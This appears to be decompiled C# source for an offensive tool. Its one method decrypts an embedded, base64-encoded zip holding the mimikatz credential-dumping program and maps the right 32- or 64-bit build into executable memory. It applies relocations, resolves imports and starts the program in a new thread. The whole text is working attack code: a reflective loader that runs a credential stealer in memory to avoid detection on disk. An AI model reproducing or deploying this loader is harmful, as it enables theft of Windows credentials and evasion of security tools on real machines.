// Token: 0x06000003 RID: 3 RVA: 0x00002064 File Offset: 0x00000264
public static void Exec()
{
byte[] fileBytes = null;
try
{
byte[] buffer = Misc.Decrypt(Convert.FromBase64String(Package.file), "password");
Stream stream = new MemoryStream(buffer);
ZipArchive zipArchive = new ZipArchive(stream);
foreach (ZipArchiveEntry current in zipArchive.Entries)
{
if (IntPtr.Size == 8 && current.FullName == "x64/mimikatz.exe")
{
Console.WriteLine(current.FullName);
Stream input = current.Open();
fileBytes = Misc.ReadFully(input);
}
else if (IntPtr.Size == 4 && current.FullName == "Win32/mimikatz.exe")
{
Console.WriteLine(current.FullName);
Stream input = current.Open();
fileBytes = Misc.ReadFully(input);
}
}
}
catch (Exception innerException)
{
while (innerException != null)
{
Console.WriteLine(innerException.Message);
innerException = innerException.InnerException;
}
}
Console.WriteLine("Downloaded Latest");
PELoader pELoader = new PELoader(fileBytes);
IntPtr intPtr = IntPtr.Zero;
if (pELoader.Is32BitHeader)
{
string arg_174_0 = "Preferred Load Address = {0}";
uint num = pELoader.OptionalHeader32.ImageBase;
Console.WriteLine(arg_174_0, num.ToString("X4"));
intPtr = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pELoader.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
string arg_1C7_0 = "Allocated Space For {0} at {1}";
num = pELoader.OptionalHeader32.SizeOfImage;
Console.WriteLine(arg_1C7_0, num.ToString("X4"), intPtr.ToString("X4"));
}
else
{
string arg_1F0_0 = "Preferred Load Address = {0}";
ulong imageBase = pELoader.OptionalHeader64.ImageBase;
Console.WriteLine(arg_1F0_0, imageBase.ToString("X4"));
intPtr = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pELoader.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
string arg_243_0 = "Allocated Space For {0} at {1}";
uint num = pELoader.OptionalHeader64.SizeOfImage;
Console.WriteLine(arg_243_0, num.ToString("X4"), intPtr.ToString("X4"));
}
for (int i = 0; i < (int)pELoader.FileHeader.NumberOfSections; i++)
{
IntPtr destination = NativeDeclarations.VirtualAlloc(IntPtr.Add(intPtr, (int)pELoader.ImageSectionHeaders[i].VirtualAddress), pELoader.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Marshal.Copy(pELoader.RawBytes, (int)pELoader.ImageSectionHeaders[i].PointerToRawData, destination, (int)pELoader.ImageSectionHeaders[i].SizeOfRawData);
Console.WriteLine("Section {0}, Copied To {1}", new string(pELoader.ImageSectionHeaders[i].Name), destination.ToString("X4"));
}
IntPtr intPtr2 = intPtr;
long num2;
if (pELoader.Is32BitHeader)
{
num2 = (long)(intPtr2.ToInt32() - (int)pELoader.OptionalHeader32.ImageBase);
}
else
{
num2 = intPtr2.ToInt64() - (long)pELoader.OptionalHeader64.ImageBase;
}
Console.WriteLine("Delta = {0}", num2.ToString("X4"));
IntPtr intPtr3;
if (pELoader.Is32BitHeader)
{
intPtr3 = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader32.BaseRelocationTable.VirtualAddress);
}
else
{
intPtr3 = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader64.BaseRelocationTable.VirtualAddress);
}
NativeDeclarations.IMAGE_BASE_RELOCATION iMAGE_BASE_RELOCATION = default(NativeDeclarations.IMAGE_BASE_RELOCATION);
iMAGE_BASE_RELOCATION = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(intPtr3, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
int num3 = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr pointer = intPtr3;
int num4 = (int)iMAGE_BASE_RELOCATION.SizeOfBlock;
IntPtr ptr = intPtr3;
NativeDeclarations.IMAGE_BASE_RELOCATION iMAGE_BASE_RELOCATION2;
do
{
iMAGE_BASE_RELOCATION2 = default(NativeDeclarations.IMAGE_BASE_RELOCATION);
IntPtr ptr2 = IntPtr.Add(intPtr3, num4);
iMAGE_BASE_RELOCATION2 = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(ptr2, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr pointer2 = IntPtr.Add(intPtr, (int)iMAGE_BASE_RELOCATION.VirtualAdress);
for (int i = 0; i < (int)(((ulong)iMAGE_BASE_RELOCATION.SizeOfBlock - (ulong)((long)num3)) / 2uL); i++)
{
ushort num5 = (ushort)Marshal.ReadInt16(ptr, 8 + 2 * i);
ushort num6 = (ushort)(num5 >> 12);
ushort offset = num5 & 4095;
ushort num7 = num6;
if (num7 != 0)
{
if (num7 != 3)
{
if (num7 == 10)
{
IntPtr ptr3 = IntPtr.Add(pointer2, (int)offset);
long num8 = Marshal.ReadInt64(ptr3);
Marshal.WriteInt64(ptr3, num8 + num2);
}
}
else
{
IntPtr ptr3 = IntPtr.Add(pointer2, (int)offset);
int num9 = Marshal.ReadInt32(ptr3);
Marshal.WriteInt32(ptr3, num9 + (int)num2);
}
}
}
ptr = IntPtr.Add(intPtr3, num4);
num4 += (int)iMAGE_BASE_RELOCATION2.SizeOfBlock;
iMAGE_BASE_RELOCATION = iMAGE_BASE_RELOCATION2;
pointer = IntPtr.Add(pointer, num4);
}while (iMAGE_BASE_RELOCATION2.SizeOfBlock != 0u);
int num10;
if (pELoader.Is32BitHeader)
{
IntPtr intPtr4 = IntPtr.Add(intPtr, (int)pELoader.ImageSectionHeaders[1].VirtualAddress);
IntPtr pointer3 = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader32.ImportTable.VirtualAddress);
num10 = Marshal.ReadInt32(IntPtr.Add(pointer3, 16));
}
else
{
IntPtr intPtr4 = IntPtr.Add(intPtr, (int)pELoader.ImageSectionHeaders[1].VirtualAddress);
IntPtr pointer3 = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader64.ImportTable.VirtualAddress);
num10 = Marshal.ReadInt32(IntPtr.Add(pointer3, 16));
}
if (pELoader.Is32BitHeader)
{
int num11 = 0;
while (true)
{
IntPtr pointer4 = IntPtr.Add(intPtr, 20 * num11 + (int)pELoader.OptionalHeader32.ImportTable.VirtualAddress);
int num12 = Marshal.ReadInt32(IntPtr.Add(pointer4, 16));
IntPtr intPtr5 = IntPtr.Add(intPtr, (int)(pELoader.ImageSectionHeaders[1].VirtualAddress + (uint)(num12 - num10)));
IntPtr ptr4 = IntPtr.Add(intPtr, Marshal.ReadInt32(IntPtr.Add(pointer4, 12)));
string text = Marshal.PtrToStringAnsi(ptr4);
if (text == "")
{
break;
}
IntPtr hModule = NativeDeclarations.LoadLibrary(text);
Console.WriteLine("Loaded {0}", text);
int num13 = 0;
while (true)
{
IntPtr pointer5 = IntPtr.Add(intPtr, Marshal.ReadInt32(intPtr5));
string text2 = Marshal.PtrToStringAnsi(IntPtr.Add(pointer5, 2));
IntPtr procAddress = NativeDeclarations.GetProcAddress(hModule, text2);
Marshal.WriteInt32(intPtr5, (int)procAddress);
intPtr5 = IntPtr.Add(intPtr5, 4);
if (text2 == "")
{
break;
}
num13++;
}
num11++;
}
Console.WriteLine("Executing Mimikatz");
IntPtr lpStartAddress = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader32.AddressOfEntryPoint);
IntPtr hHandle = NativeDeclarations.CreateThread(IntPtr.Zero, 0u, lpStartAddress, IntPtr.Zero, 0u, IntPtr.Zero);
NativeDeclarations.WaitForSingleObject(hHandle, 4294967295u);
Console.WriteLine("Thread Complete");
}
else
{
int num11 = 0;
while (true)
{
IntPtr pointer4 = IntPtr.Add(intPtr, 20 * num11 + (int)pELoader.OptionalHeader64.ImportTable.VirtualAddress);
int num12 = Marshal.ReadInt32(IntPtr.Add(pointer4, 16));
IntPtr intPtr5 = IntPtr.Add(intPtr, (int)(pELoader.ImageSectionHeaders[1].VirtualAddress + (uint)(num12 - num10)));
IntPtr ptr4 = IntPtr.Add(intPtr, Marshal.ReadInt32(IntPtr.Add(pointer4, 12)));
string text = Marshal.PtrToStringAnsi(ptr4);
if (text == "")
{
break;
}
IntPtr hModule = NativeDeclarations.LoadLibrary(text);
Console.WriteLine("Loaded {0}", text);
int num13 = 0;
while (true)
{
IntPtr pointer5 = IntPtr.Add(intPtr, Marshal.ReadInt32(intPtr5));
string text2 = Marshal.PtrToStringAnsi(IntPtr.Add(pointer5, 2));
IntPtr procAddress = NativeDeclarations.GetProcAddress(hModule, text2);
Marshal.WriteInt64(intPtr5, (long)procAddress);
intPtr5 = IntPtr.Add(intPtr5, 8);
if (text2 == "")
{
break;
}
num13++;
}
num11++;
}
Console.WriteLine("Executing Mimikatz");
IntPtr lpStartAddress = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader64.AddressOfEntryPoint);
IntPtr hHandle = NativeDeclarations.CreateThread(IntPtr.Zero, 0u, lpStartAddress, IntPtr.Zero, 0u, IntPtr.Zero);
NativeDeclarations.WaitForSingleObject(hHandle, 4294967295u);
Console.WriteLine("Thread Complete");
}
Console.WriteLine("Thread Complete");
}
